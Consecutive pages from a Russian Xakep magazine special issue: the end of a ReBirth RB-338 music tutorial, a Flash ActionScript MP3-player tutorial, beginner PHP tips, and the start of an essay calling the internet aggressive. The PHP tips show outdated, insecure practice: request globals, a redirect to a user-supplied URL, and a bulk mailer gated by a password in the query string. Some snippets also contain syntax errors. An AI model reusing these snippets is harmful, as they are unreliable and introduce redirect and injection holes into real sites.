Итак, нажимаем кнопку Record и давим Play. Играет музон, он записывается, пока нажата кнопка Record. Заметь - Bar начал постепенно увеличиваться.


Спецвыпуск Xakep, номер #029, стр. 029-109-4, ВВЕДИ ВСЕХ В ТРАНС! ReBirth RB-338 подробно

ВВЕДИ ВСЕХ В ТРАНС! ReBirth RB-338 подробно

Volant

Спецвыпуск Xakep, номер #029, стр. 029-109-4

Для начала поставим в качестве драма паттерны под цифрой 1, первую дорожку выключим, а бас пусть будет шестым паттерном. Пошла музыка. Сначала это просто короткий отрывок электронного баса с поддержкой легкого бита, именно легкого. Затем начинаем поворачивать регулятор задержки звука Delay, который находится на панели Mix. Постепенно появляется эхо, и звук начинает перемешиваться, делаем тоже самое с легким битом. Теперь начинаем медленно увеличивать показатели на основной панели. Изменяем параметры Tune, Cutoff, Reso, Env.Mod, Decay и Accent, доводя каждый до середины, и чуть выше выборочно мы получаем увеличение низких, высоких и средних частот, таким образом, добавляется количество шумовых эффектов и появляется переплетение звука. Теперь немного поиграем с мелодией, для этого просто в такт сначала резко увеличиваем Cutoff, а при следующем такте ставим на место, и так, к примеру, четыре раза, затем оставляем этот показатель чуть выше, чем был до этого. Так делаем с несколькими показателями. Теперь постепенно повышаем громкость первой дорожки и опять же начинаем изменять Tune, Cutoff, Reso, Env.Mod, Decay и Accent. Затем резко добавляем дорожку с битом. Если будет казаться слишком просто, сохраняем трек, на всякий случай, включаем его и во время проигрывания добавляем еще спецэффекты; PCF, например, дает очень классные частотные преобразования. Можно изменять стандартные спецэффекты или вообще сначала создать только бас и синтезаторный треки, а во второй раз уже бит.

Поле для экспериментов огромно. Постепенно ты напишешь свои паттерны, а твои треки станут все более сложными и изощренными. Главное, не останавливайся, приходи домой вечерком, врубай колонки на полную, и да пребудет сила с твоими соседями!

Энтузиасты накреативили кучу скинов для ReBirth, так что если тебя уже не впирает стандартный скин, срочно беги на www.propellerheads.se и качай по полной программе - там их тьма.

Музыка создается именно с помощью твоих рук и твоей реакции. Именно с этой программой ты можешь почувствовать себя настоящим ди-джеем, так как сам трек сводится и записывается в Real time.

Интерфейс проги представляет собой точную копию синтезатора и двух драммашины. Ничего лишнего! Ты сразу можешь покрутить любую ручку, щелкнуть переключателем и получить какой-то звуковой эффект.


Спецвыпуск Xakep, номер #029, стр. 029-112-1, TIPS OF FLASH: - MP3 плеер в одну строку

TIPS OF FLASH: - MP3 плеер в одну строку

Iv (dembicki@narod.ru)

Спецвыпуск Xakep, номер #029, стр. 029-112-1

Интернет сейчас, как немое кино в начале прошлого века. Некоторые сайты озвучены фоновой музыкой, а на особо продвинутых можно выбрать одну из 3-4 мелодий. Но можно ворчать, а можно юзать то, что доступно сейчас. Мы с тобой, например, сделаем сегодня MP3 плеер с возможностью выбора пользователем полюбившегося ему трека. Также дадим возможность юзеру посмотреть инфу по песне. Причем при помощи этого энджина а) элементарно добавить новую mp3'шку на сайт, не меняя мувика и б) можно слушать музыку почти сразу, не дожидаясь загрузки mp3.

TIPS 1. XML-описание

Если нужно передавать во Flash параметры извне, юзь XML - он крут. Сделаем XML с описанием песен и положим несколько MP3 в папку music. Вот какой playlist.xml вышел у меня:

<playlist>

<item url="blamme.mp3"

songName="blamme"

artist="strekachi"

album="Full charge 2000"

genre="drum-n-bas"

comment="это кульная песня!"

duration="189649"/>

<item url="fuzz_fucking.mp3"

songName="fuzz fucking"

artist="prodigi"

album="nope "

genre="nope "

comment="это же продиги"

duration="201326"/>

<item url="track1.mp3"

songName="X-item"

artist="XX"

album="xxx "

genre="sample "

comment="это сэмпл"

duration="8333"/>

</playlist>

TIPS 2

Я не стал полагаться на получение стандартных тегов из MP3, а описал свои в XML. Гораздо удобнее писать в своем XML, что в голову взбредет, чем париться исправлять теги в MP3. Тем более, что XML нас ничем не ограничивает в смысле количества атрибутов и их наполнения. И к тому же эти данные мы можем получить, не загружая MP3 файлы.

TIPS 3. Подготовительный этап

FLA сохраним в той же папке, что и XML. Кодим в первом кадре рута. Этаж привесим в левый верхний угол и запретим масштабироваться:

Stage.align = "TL";

Stage.scaleMode = "noscale";

Сделаем настройки для XML - берем текущую кодовую страницу и игнорируем пробелы во всех XML документах:

System.useCodePage = true;

XML.prototype.ignoreWhite = true;

Раз есть XML, снова юзаем мою любимую функцию для обхода дерева:

// (c) Ivan Dembicki, dembicki@narod.ru

XMLNode.prototype.nextNode = function() {

if (this.firstChild != null) {

return this.firstChild;

}

var n = this;

while (n.nextSibling == null) {

if (n.parentNode) {

n = n.parentNode;

} else {

return null;

}

}

return n.nextSibling;

};

Подготовка закончена.

TIPS 4. Загрузка и обработка XML

Создадим объект XML и грузанем в него наш XML документ, и сразу после загрузки расставим ID узлам XML. Затем определим, если проект запущен локально (т.е. URL начинается с "file:///"), то вызываем функцию вывода на экран значений продолжительности звучания всех роликов. После этого инициализируем наш MP3 плеер.

input_xml = new XML();

input_xml.load("playlist.xml");

this.input_xml.onLoad = function(success) {

if (success) {

if (this.status != 0) {

trace("invalid xml");

} else {

var i = 0;

var nod = this.firstChild;

while (nod) {

nod.attributes.ID = i++;

nod = nod.nextNode();

}

this.parseXML(this.firstChild);

if (_url.substring(0, 8) == "file:///") {

_root.getDurations();

}


Спецвыпуск Xakep, номер #029, стр. 029-112-2, TIPS OF FLASH: - MP3 плеер в одну строку

TIPS OF FLASH: - MP3 плеер в одну строку

Iv (dembicki@narod.ru)

Спецвыпуск Xakep, номер #029, стр. 029-112-2

var mc = _root.attachMovie("play_box_mc", "play_box_mc", 0);

mc.total = i-1;

mc._x = 100;

mc._y = 100;

mc.showString();

}

} else {

trace("error opening URL");

}

};

TIPS 5. Определяем длительность звучания

Для того чтобы с секундомером в руках не вычислять длительность звучания песенок, мы функцией выведем эти значения в окно Output. Принцип таков: грузим все песенки по принципу эстафетной палочки: как только загрузилась одна, получаем данные о ее продолжительности и тут же грузим следующую. И так - пока не доберемся до конца описания.

_root.getDurations = function() {

_root.nod = _root.input_xml[++_root.id];

if (_root.nod == undefined) {

delete _root.id;

delete _root.nod;

delete _root.test_sound;

_root.duration_mc.removeMovieClip();

return;

}

delete _root.test_sound;

var mc = _root.createEmptyMovieClip("duration_mc", 50);

mc.test_sound = new Sound();

mc.test_sound.loadSound("music/"+_root.nod.attributes.url, false);

mc.onEnterFrame = function() {

var l = this.test_sound.getBytesLoaded();

var t = this.test_sound.getBytesTotal();

if (l/t == 1) {

trace("\rfile:\t\t"+_root.nod.attributes.url);

trace("duration:\t"+this.test_sound.duration);

_root.getDurations();

}

};

};

Как создашь XML описание, эту функцию нужно закомментировать, и компилировать окончательный вариант без нее. Можно закомментировать и те строки, которые осуществляют вызов этой функции.

TIPS 6. Интерфейс проигрывателя

Cразу после парсинга XML строкой var mc = _root.attachMovie("play_box_mc", "play_box_mc", 0); мы аттачим мувик "play_box_mc" из библиотеки. Создай пустой мувик, задай ему это имя и этот же linkage name. В этом мувике мы сделаем все кнопки и текстовое поле для отображения инфы о файле.

Нарисуй кнопки управления. Вид твоих кнопок должен, соответственно, символизировать:

1. кнопка Play

2. кнопка Stop

3. ползунок Volume

4. кнопка Info

5. две кнопки перелистывания

Шестой элемент - текстовое поле.

Все кнопки в четвертом (Hit) кадре содержат квадрат 16x16, исключение - кнопки перелистывания в текстовом поле. Соответственно их тип - button (за исключением ползунка). Имена экземпляров слева направо: play_butt, stop_butt, volume_butt, ползунок к volume_butt - control_mc, info_butt, up_butt и down_butt и текстовое поле string_txt без имени переменной. Это все объекты, которые необходимо предварительно создать.

TIPS 7. Кодинг

Задавать скрипты мы будем в том же порядке, что и их расположение на сцене. Все скрипты будем писать в отдельном верхнем слое первого кадра мувиклипа, который содержит все эти объекты, - play_box_mc.

Важный момент: к объектам и переменным в мувиклипе, содержащем кнопки, из этих кнопок можно обращаться двумя способами: первый - с использованием this. This будет явно указывать на кнопку, и тогда объекты в мувиклипе будут доступны по пути this._parent; второй способ - без указания this объекта, тогда объекты проигрыватель будет искать по местонахождению скрипта.

В большинстве случаев я пошел по второму пути - так короче.

Вначале изменим стандартное время предзагрузки звукового файла до 20 секунд. С учетом средней скорости наших сетей это полезно.


Спецвыпуск Xakep, номер #029, стр. 029-112-3, TIPS OF FLASH: - MP3 плеер в одну строку

TIPS OF FLASH: - MP3 плеер в одну строку

Iv (dembicki@narod.ru)

Спецвыпуск Xakep, номер #029, стр. 029-112-3

_soundbuftime = 20;

Определим, какую по счету песенку мы хотим показать в информационном окне:

this.id = 1;

И зададим текстовому полю нужные свойства:

this.string_txt.borderColor = 0x333399;

this.string_txt.border = true;

TIPS 8. Кнопка PLAY

При клике на кнопку сохраним номер выбранной песни в переменной, хранящей номер активной песни. Переменной, хранящей статус, зададим значение "played". Дальше, если уже какая-нибудь песенка проигрывается, то остановим ее, создадим новый объект Sound, заменив им предыдущий с таким же именем, и начинаем загружать и проигрывать в потоковом режиме выбранную музыку. Задаем значение громкости в зависимости от позиции ползунка. Строкой showString() - обновляем информационное текстовое поле (об этой функции будет ниже). И задаем действия, которые нужно совершить после того, как музыка отыграет, - изменим статус и обновим информационное окно.

this.play_butt.onRelease = function() {

active_id=id, stat="played";

my_sound.stop();

my_sound = new Sound();

my_sound.loadSound("music/"+_root.input_xml[id].attributes.url, true);

my_sound.setVolume(100-control_mc._y*100/16);

showString();

my_sound.onSoundComplete = function() {

stat="stopped", showString();

};

};

TIPS 9. Кнопка STOP

Изменяем статус проигрываемой песни, обновляем информационное текстовое поле и останавливаем проигрывание музыки.

this.stop_butt.onRelease = function() {

stat="stopped", showString();

my_sound.stop();

};

TIPS 10. Кнопка с ползунком VOLUME

Это два разных объекта. Ползунок не имеет собственных методов до тех пор, пока не нажата кнопка! При нажатии ползунку задаются функции, при отпускании убиваются. Смысл вычислений, происходящих при нажатой кнопке, сводится к тому, чтобы сместить ползунок на одну пятую (можно это число изменить) от смещения мыши после нажатия на кнопку. Ползунок очень маленький, поэтому, чтобы пользователь не пристреливался мышкой на нужный уровень звука, а спокойно изменял его, двигая мышкой в комфортном ему диапазоне, я и установил коэффициент перемещения 1/5. Затем, проверив крайние положения, вычисляем, какой уровень громкости задать. И обновляем информационное поле.

this.volume_butt.onPress = function() {

var mc = this._parent.control_mc;

mc.poz = mc._y;

mc.onMouseMove = function() {

this._y = (this._parent._ymouse-this.poz)/5+this.poz;

if (this._y<0) {

this._y = 0;

} else if (this._y>16) {

this._y = 16;

}

this._parent.my_sound.setVolume(100-this._y*100/16);

this._parent.showString();

};

mc.onMouseUp = function() {

delete this.onMouseMove;

delete this.onMouseUp;

};

};

TIPS 11. Кнопка INFO

Меняет значение булевой переменной на противоположную и обновляет информационное поле.

this.info_butt.onRelease = function() {

info=!info, showString();

};

TIPS 12. Кнопки UP и DOWN

Действие этих кнопок сводится к тому, чтобы изменить в соответствующую сторону значение ID, при этом проверив крайние положения. При выборе ID большем, чем максимально возможное, переходим на первый, и наоборот, при выборе меньше, чем единица, переходим на максимально возможное. В результате получаем зацикливание.


Спецвыпуск Xakep, номер #029, стр. 029-112-4, TIPS OF FLASH: - MP3 плеер в одну строку

TIPS OF FLASH: - MP3 плеер в одну строку

Iv (dembicki@narod.ru)

Спецвыпуск Xakep, номер #029, стр. 029-112-4

this.down_butt.onRelease = function() {

++id>total ? id=1 : "", showString();

};

this.up_butt.onRelease = function() {

--id<1 ? id=total : "", showString();

};

TIPS 13. Функция showString

Эта функция собирает, где только возможно, данные о выбранной музыке и помещает в текстовое поле. Данные берутся в основном из узла XML, а также из переменных, которые мы устанавливаем в ходе манипуляций кнопками, из свойств объекта sound.

Отдельно расскажу о последней части функции, со строки this.string_txt.autoSize = true; Этой строкой устанавливается автоматический размер окна. После этого, в зависимости от того, какая выбрана установка, решаем, какой размер окна по высоте будем устанавливать - полный или только по высоте одной строки (16). Далее отменяем автоматический размер окна и устанавливаем тот, который выбрали. Таким образом, мы не удаляем дополнительные данные - их просто не видно в маленьком окне.

this.showString = function() {

var volume = this.my_sound.getVolume();

var att = _root.input_xml[id].attributes;

var min = Math.floor(att.duration/1000/60);

min<10 ? min="0"+min : "";

var sec = Math.floor(att.duration/1000)%60;

sec<10 ? sec="0"+sec : "";

var curr = this.id == this.active_id;

var stat = curr ? this.stat : "off";

var str = this.id+".\tsong:\t\t"+att.songName;

str += "\t\r\tstatus:\t\t"+stat;

if (stat == "played") {

str += "\t\r\tvolume:\t"+volume;

}

str += "\t\r\tartist:\t\t"+att.artist;

str += "\t\r\talbum:\t"+att.album;

str += "\t\r\tgenre:\t\t"+att.genre;

str += "\t\r\tduration:\t"+min+":"+sec;

str += "\t\r\tcomments:\r\t"+att.comment;

this.string_txt.text = str;

this.string_txt.autoSize = true;

var h = this.info ? this.string_txt._height : 16;

this.string_txt.autoSize = false;

this.string_txt._width = 280;

this.string_txt._height = h;

};

После того как задана функция, вызовем ее, чтобы показать в текстовом поле стартовые настройки:

this.showString();

TIPS 14. Прелодер, индикатор проигрывания

Для того чтобы юзверь видел, какая часть музыкального файла уже загрузилась и в каком месте проигрывается файл, нужно сделать соответствующий индикатор. Для этого создаем мувик и располагаем его чуть выше всех наших объектов.

this.createEmptyMovieClip("loader_mc", 1);

this.loader_mc._y = -5;

Определяем 100% длину индикаторной линии от нулевой координаты до конца текстового поля:

this.loader_mc.w = string_txt._width+string_txt._x;

И обсчитываем две цифры: процент загрузки и процент позиции проигрывания.

Эти цифры рассчитываем с учетом того, что 100% это длина всей индикаторной линии.

И затем последовательно рисуем линии, соответствующие этим значениям.

this.loader_mc.onEnterFrame = function() {

var s = this._parent.my_sound;

var l = s.getBytesLoaded();

var t = s.getBytesTotal();

var p = s.position;

var d = _root.input_xml[this._parent.active_id].attributes.duration;

var x = l/t*this.w;

this.clear();

this.lineStyle(6, 0x000000, 100);


Спецвыпуск Xakep, номер #029, стр. 029-112-5, TIPS OF FLASH: - MP3 плеер в одну строку

TIPS OF FLASH: - MP3 плеер в одну строку

Iv (dembicki@narod.ru)

Спецвыпуск Xakep, номер #029, стр. 029-112-5

this.moveTo(0, 0), this.lineTo(this.w, 0);

this.lineStyle(4, 0x999999, 100);

this.moveTo(0, 0), this.lineTo(x, 0);

d ? x=p/d*this.w : x=0;

this.lineStyle(2, 0xCCCCCC, 100);

this.moveTo(0, 0), this.lineTo(x, 0);

};

Итак, ты получил представление о том, как сделать свой он-лайн проигрыватель MP3 файлов. Если мозги целы, поздравляю! Если что-то у тебя не будет получаться или заметишь баг, то пиши мне на мыло dembicki@narod.ru или бросайся ко мне на сайт.


Спецвыпуск Xakep, номер #029, стр. 029-114-1, TIPS OF WEB: php для самых маленьких

TIPS OF WEB: php для самых маленьких

Sevranty

Спецвыпуск Xakep, номер #029, стр. 029-114-1

(sevranty@deepdesign.ru, vsevolod.deepdesign.ru)

Привет, дорогой любитель чипсов... то есть типсов, получай свою порцию! Сейчас даже на халявных хостингах обязательно торчит php. С помощью этого яза можно замутить всякие не сложные, но очень полезные фишки. Ну так что, замутим?

TIPSa 1

Инклуды, инклудики

Не пихай икру и сгущенку в одну миску. Разложи самодостаточные куски кода по файлам, а в основном скрипте юзай рекваи.

Этот кусок кода <?php require 'includes/header.php'; ?> вызывает файл includes/header.php и результат его работы вставляет на место реквая. Файл header1.php должен находиться в подкаталоге includes. Для вставки определенного файла, в зависимости от переменной, можно юзать такую загогулину:

<?php

if ($main =='') { require 'includes/header1.php'; }

else { require 'includes/header2.php'; }

?>

Если переменная mail пустая, то грузится header1.php, иначе header2.php.

TIPSa 2

В случае, если у тебя нестандартно установлен php или надо указать абсолютный путь, но не от корня сервера, а от корня виртуального хоста (очень помогает при переносе сайта на другой хостинг), то используем конструкцию:

<?php

$file_path = $DOCUMENT_ROOT."/includes/header3.php";

require ($file_path);

?>

Такая фиговина вызовет файл header3.php из директории includes, расположенной в корне твоего виртуального хоста.

TIPSa 3

Показ случайной фразы

Вначале подключаем генератор псевдослучайных чисел, потом переменной num присваиваем случайное число от 1 до 5, потом, в зависимости от этого числа, выводим 1 из 5 фраз.

<?php

# рэндом, однако

srand((double)microtime()*1000000);

$num = rand(1,5);

?>

<? if ($num == '1') { ?>Фраза n.1<br>Ку 1 раз<?php } ?>

<? if ($num == '2') { ?>Фраза n.2<br>Ку-ку 2 раза<?php } ?>

<? if ($num == '3') { ?>Фраза n.3<br>Ку-ку-ку 3 раза<?php } ?>

<? if ($num == '4') { ?>Фраза n.4<br>Ку-ку-ку-ку 4 раза<?php } ?>

<? if ($num == '5') { ?>Фраза n.5<br>Ку-ку-ку-ку-ку 5 раз<?php } ?>

TIPSa 4

Кроме злополучного if, ту же конструкцию можно записать с помощью case и(или) массивов. Вначале не забудь инициировать генератор псевдослучайных чисел и присвоить переменной число из заданного диапазона:

<?php

witch ($num){

case "1":

# Действие 1

break;

case "2":

# Действие 2

break;

case "3":

# Действие 3

break;

default:

# Действие по умолчанию

# если переменная не равна 1, 2 или 3-м

break;

}

?>

TIPSa 5

Иногда для упрощения кода используют ассоциативные массивы:

<?php

# рэндом, однако

srand((double)microtime()*1000000);

$num = 'value'.rand(1,100);

$trash_mas = array(

"value1" => "/includes/header1.php",

"value2" => "/includes/header2.php",

"value3" => "/includes/header3.php",

if (isset($trash_mas[$num])) {

$file_path = $DOCUMENT_ROOT.$trash_mas[$num];

require ($file_path);

}

else {

$file_path = $DOCUMENT_ROOT."/includes/header_default.php";

require ($file_path);

}

?>

Вначале инициируем генератор и присвоим переменной num значение от 'value1' до 'value100'. Потом опишем массив, далее, в зависимости от значения переменной в массиве, включим определенный файл.


Спецвыпуск Xakep, номер #029, стр. 029-114-2, TIPS OF WEB: php для самых маленьких

TIPS OF WEB: php для самых маленьких

Sevranty

Спецвыпуск Xakep, номер #029, стр. 029-114-2

Эти скрипты в различных вариациях используются для вывода случайных баннеров, интерактивной генерации страниц, вставки всяких ориджинов и комментов.

TIPSa 6

Определение времени вывода страницы

Все просто до извращения. Попробуешь, и тебе понравится. В начале файла или в первом реквае на странице надо присвоить переменной timestart время, когда началась генерация нашей странички. Предварительно напишем функцию, которая приведет ответ microtime() в удобоваримый вид, по умолчанию это 2 числа через пробел, десятичное долей секунды и действительное в юних-секундах от начала века.

<?php

function getmicrotime(){

list($usec, $sec) = explode(" ",microtime());

return ((float)$usec + (float)$sec);

}

$timestart = getmicrotime();

?>

<html>

<body>

Потом у нас выводится вся наша страница. Наши любимые несколько килобайт кода, море рекваев и куча вспомогательных скриптов. Потом приходит конец страницы. Кстати, надо сделать так, чтобы написанная нами функция getmicrotime была доступна и в конце нашей страницы.

<?php

$timeend = getmicrotime();

$timenormal=$timeend-$timestart;

$timenormal=round ($timenormal, 3);

echo 'Страница генерилась '.$timenormal.' секунды';

?>

</body>

</html>

Этот скрипт прост. Присвоили время с точностью до шести знаков после запятой секунды. Далее посчитали разницу между начальным и конечным значениями. Потом округлили полученное значение до трех знаков после запятой. А теперь ТО САМОЕ число мы выводим в конце страницы.

TIPSa 7

Отправка сообщения со страницы с возвратом на ту же страницу

Если не усложнять себе жизнь, то этого эффекта можно добиться очень просто. Для этого мне хватает двух файлов. Я этот кусок кода вставляю на страницу рекваем и не мучаюсь. Он отсылает инфу из скриптика send.php, лежащего в той же директории, что и файл, в котором включен этот код. Также он сохраняет урл текущей страницы, чтобы потом на него вернуться:

<form method="post" action="send.php">

<b>Твои комменты:</b></br>

<input type="hidden" name="urlnow" value="<?php $url = sprintf("%s%s%s","http://",$HTTP_HOST,$REQUEST_URI); echo "$url"; ?>">

<textarea name="message"><?php

if ($send=="ok"||$send=="bad") {

if ($send=="ok") {

echo "Твои комменты успешно запостены";

}

if ($send=="bad") {

echo "Твой треш не был отправлен";

}

}

else {

?>Incognito (none@email.me):<?php

}

?></textarea>

<input type="submit" name="submit" value="Отправить">

</form>

Теперь, передав наши два парамента urlnow - текущая страница message - текст комментария - в скрипт send.php, мы посмотрим, что же там творится.

<?

$urlback = $urlnow;

$timeall = 'Date: '.Date( 'D, d M Y H:i:s ').$SIGN.sprintf( '%02d%02d',floor($ZONE/3600),floor(($ZONE%3600)/60)). "\n";

$msg .= $timeall;

$msg .= "REMOTE_ADDR: $REMOTE_ADDR\n";

$host = gethostbyaddr("$REMOTE_ADDR");

$msg .= "HOST: $host\n";

$msg .= "$urlback\n";

$msg .= "> КОММЕНТАРИЙ:\n";

$msg .= $message;


Спецвыпуск Xakep, номер #029, стр. 029-114-3, TIPS OF WEB: php для самых маленьких

TIPS OF WEB: php для самых маленьких

Sevranty

Спецвыпуск Xakep, номер #029, стр. 029-114-3

$msg .= " \n";

$msg .= "------------------------------------------\n";

$msg = convert_cyr_string($msg,'w','k');

if ($message=="Incognito (none@email.me):") { $send = 'bad'; }

else {

$topic = "COMMENT. feedback";

$email="comment@domen.ru";

mail($email, $topic, $msg, "From: comment@domen.ru");

$send = 'ok';

}

$goto = 'Location: '.$urlback.'?send='.$send;

Header($goto);

?>

Здесь мы увидим много интересного и непонятного %-). Для начала узнаем дату, когда же нам умудрился написать этот чел. Получив это время поточнее %-), мы его вставим в сообщение, которое будем себе отправлять. Также допишем в сообщение IP чела и имя его хоста. А еще допишем урл, с которого отправлено сообщение, чтобы знать, что же чел комментирует. Теперь вставим сам текст сообщения. Для того чтобы я потом не парился, переконвертирую это все из win-1251 в koi8-r (у меня почтовый клиент больше любит koi8-r). Если сообщение, которое нам запостили, является пустышкой, отсылаем обратно с сообщением об ошибке. Если сообщение не пустышка, то посылаю письмо на свой адрес comment@domen.ru и выдаю сообщение, что ВСЕ ОК. Теперь переправил пользователя обратно на страницу, с которой он имел наглость запостить мессагу :).

В теле нашей формы есть проверка на присутствие ответа скрипта-посланца. Если ошибка, он пишет: "Твой треш не был отправлен". Если сообщение отправлено нормально, то он пишет: "Твои комменты успешно запостены".

TIPSa 8

Рассылка

Для создания рассылки нам необходим такой минимум: php, sendmail, 3 файла на серваке. Первый файл - mail_db.txt, в нем записаны адреса, на которые мы хотим разослать свои письма. На каждой строчке один e@mail. Например:

none@none.ru

none@mail.ru

none@inbox.ru

Второй файл - это само сообщение, которое мы хотим безжалостно скинуть на всех. Например:

Привет, великий ALL.

ЭТО ТЕСТ!

Пока.

Третий файл maillist.php - это скрипт рассылки. Он же будет показывать нам результат своей работы.

<html>

<head>

<meta http-equiv=content-type content="text/html; charset=windows-1251">

<title>Рассылка почты:</title>

</head>

<body>

<h1>Рассылка почты:</h2>

<hr noshade size="2" color="#D40000">

<?php

$password = "mailok";

echo "<b>Подключение файлов:</b><br>\n\n";

echo "1. "; $temp = file("message.txt"); $sendread = join("", $temp); echo "message.txt - тело сообщения<br>";

?>

<hr noshade size="2" color="#D40000">

<?php

echo "<b>Композиция сообщения:</b><br>\n\n";

$msg = "";

$msg .= $sendread; $msg .= " \n";

echo "<pre>".$msg."</pre>";

?>

<hr noshade size="2" color="#D40000">

<?php

echo "<b>Подключение списка адресов:</b><br>\n\n";

$mailfile = fopen ("mail_db.txt", "r");

if (!$mailfile) { echo "<p>Unable to open remote file ".$mailfile." \n"; }

while (!feof($mailfile))

{

$read = fgets($mailfile, 2048);

list($emails) = split(" ",$read);

ereg_replace("\n","",$emails);

$email[]=$emails;

}

fclose($mailfile);

$cemail = count($email);

$i = 0;

echo "<br><b>Всего записей в файле: ".$cemail."</b><br>\n\n";


Спецвыпуск Xakep, номер #029, стр. 029-114-4, TIPS OF WEB: php для самых маленьких

TIPS OF WEB: php для самых маленьких

Sevranty

Спецвыпуск Xakep, номер #029, стр. 029-114-4

?>

<hr noshade size="2" color="#D40000">

<?php

if ($pass==$password) { echo "<b>OK</b>. Рассылка <b>начата</b>"; }

else { echo "<b>NOT</b>. Рассылка <b>НЕ</b> начата"; }

echo "<pre>";

echo " статус: id: e-mail:";

while ($i < $cemail) {

ereg_replace("\n","",$email[$i]);

$email[$i] = chop($email[$i]);

$itemp = $i+1;

$topics = "";

$topics .= "XAKEP MAILLIST: ".$itemp." - моя первая рассылка";

$topics .= "(".Date( 'd M Y').") ";

$topics .= "To:".$email[$i];

echo "<li>";

if ($pass==$password) { mail($email[$i], $topics, $msg, "From: sevranty@deepdesign.ru"); echo "[<b>OK</b>] ";}

else { echo "[<b>NOT</b>] "; }

echo "<b>".$itemp."</b> - ".$email[$i]."\n";

$i++;

}

echo "</pre>\n";

?>

<hr noshade size="2" color="#D40000">

<b>File End</b><br><br>

</body>

</html>

Сам скрипт maillist.php инициируется запросом maillist.php?pass=mailok. Без этого запроса он показывает всю инфу, но не расcылает сообщения. Это своего рода страховка от ложных запусков.

Для самых маленьких опишу скрипт пошагово:

1. вначале подключаем внешний файл message.txt, находящийся в той же директории, что и скрипт;

2. на основе этого файла создаем сообщение;

3. подключаем файл e@mail'ов, считываем эти адреса, пока не кончится файл, закрываем файл, выводим количество подключенных записей;

4. в зависимости от валидности пароля, начинаем рассылку или выводим список адресов.

Все просто и ясно %-).


Спецвыпуск Xakep, номер #029, стр. 029-116-1, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-1

1.

Я хочу начать разговор с мысли, к которой пришел не сразу. Я пробивался к ней сквозь преграды, многочисленные запреты и разрешения, через любовь и ненависть, сквозь жизненные бури и виртуальные радости. Я обрел это знание - настолько, насколько вообще человек может обладать какой-либо истиной. Я ощутил всю философскую глубину своей мысли совсем недавно, а уж поделиться ею с вами всеми я захотел всего несколько секунд назад. Это решение пришло довольно внезапно - но оно лишний раз доказывает то, что я СОЗРЕЛ. Я впитал в себя то, о чем хочу поговорить с вами и со всем миром. Вы еще не видите того, что уже прошло через меня - как в прямом, так и в переносном смысле. Я же увидел все это - и в зеркале отразились седые волосы, которых прежде никогда не было. Увидев и не поверив, я взглянул еще раз - и в ход пошли антидепрессанты, ибо та всепоглощающая, всеуничтожающая и как еще вам угодно сила не просто оставила след во мне. Она подхватила меня и понесла как пушинку. Подо мной проносились страны и моря, люди и звери, радости и беды, праздники и катастрофы - но я не замечал этого; я внимал гласу бездны.

Хочется заметить, что недаром слово «шизофрения» означает «рваное мышление». Моим мыслям тесно в рамках тех слов, что составляют мой словарный запас, - даже несмотря на два высших образования. Кто-то уже хмыкнул и отошел - что же, значит, он будет следующим. Каждый, кто избегнет общения со мной, получит сполна все то, что испытал я сам - чуть попозже. Мне так и хочется остановить всех, кто в эту секунду поворачивается ко мне спиной, - не делайте этого, друзья! Не оставляйте после себя незачищенных уровней (меня поймут те, кто, как и я, проводил часы и дни за вечно любимым «Diablo»).

Ну, что же, простимся с ними, ушедшими в свою собственную жизнь, делающими судьбу такой, какой она ложится на плечи, без купюр и подделок. Но не завидуйте им - это не только бессмысленно, но и противоестественно. Ведь я еще не сказал самого главного - а значит, они не умели слушать.

Не торопите меня, я прекрасно понимаю, что интриговать можно лишь непродолжительное время; потом человек устает, степень концентрации его внимания уменьшается, стремится к нулю. Нужно ударить по нервам. Я готов. Вы - готовы?

Я вижу миллионы согласных кивков и миллионы скептических усмешек. Я вижу горящие глаза и горящие города. Я вижу руки на клавиатурах и пальцы на курках. Я чувствую ветер перемен и ударную волну. Я слышу Монсеррат Кабалье и крики «Хайль!!!» Я вдыхаю Шанель №5, но из-за спины доносится запах синильной кислоты. Я прикасаюсь к коже, но ладони примерзают к металлу.

Единство и борьба противоположностей. Вас - поровну. На той стороне и на этой. ЛОЖЬ, ЧТО ХОРОШИХ ЛЮДЕЙ БОЛЬШЕ. НО ЛОЖЬ И ОБРАТНОЕ. Так было всегда.

«Когда вы всматриваетесь в бездну, бездна всматривается в вас». За один этот эпиграф стоит полюбить Камерона. Наплюйте на «Титаник», на всех его «Терминаторов» с «Чужими» - но оставьте себе тот кадр из «Пропасти», где на черном фоне можно прочитать великие слова. Ведь несмотря на сам факт существования бездны, приятно осознавать, что есть кто-то, заглядывающий за край - пусть со страхом, пусть из звериного любопытства...


Спецвыпуск Xakep, номер #029, стр. 029-116-2, УРОВЕНЬ АГРЕССИИ

УРОВЕНЬ АГРЕССИИ

Спецвыпуск Xakep, номер #029, стр. 029-116-2

Я заглянул. Я ВИДЕЛ.

Поверьте мне - она действительно СМОТРИТ.

И вот теперь, когда я хоть чуть-чуть, пусть самую малость, но сумел привлечь к себе внимание, я скажу то, ради чего, собственно, и начал этот разговор. Я произношу это вслух.

ИНТЕРНЕТ - СУЩЕСТВО АГРЕССИВНОЕ.

Пауза.

Главное, чтобы эта пауза не слишком затянулась, чтобы все мы внимательно рассмотрели мое заявление, которое я попытаюсь запихать примерно в пятьдесят тысяч знаков с пробелами.

Слышу, слышу - «Не надо наделять Сеть чертами, присущими разуму!» А разве я об этом?

Никакого разума (в смысле, у Сети).

ТОЛЬКО МЫ С ВАМИ. ВЫ И Я.

Сколько у вас в «Избранном» закладок? Десять? Двадцать? Сто? Я сомневаюсь, что больше. Либо вас самих можно заносить в «Избранное».

Сколько времени вы проводите в Сети? Час? Два? Сутки? Не пора ли писать письмо Гиннессу?

Насколько велик ваш контакт-лист ICQ? Там один ваш близкий друг из Нью-Джерси? Может, их трое - Крэйзи из Тамбова, Джад из Майами и некий «Мюллер» из Гамбурга? Или все-таки там около двадцати плохо читаемых ников, две трети из которых сами не знают, с кем общаются в настоящий момент?

Я уверен, что вы с трудом вспомните, где лежит пульт от телевизора, ибо с некоторых пор он отнесен в разряд вещей ненужных и бесполезных. Факт, что вы печатаете быстрей, чем пишете (ну, уж я-то точно). Кстати, вы заметили, что я не против всего того, о чем говорю, и не противопоставляю себя вам? Я такой же, как вы.

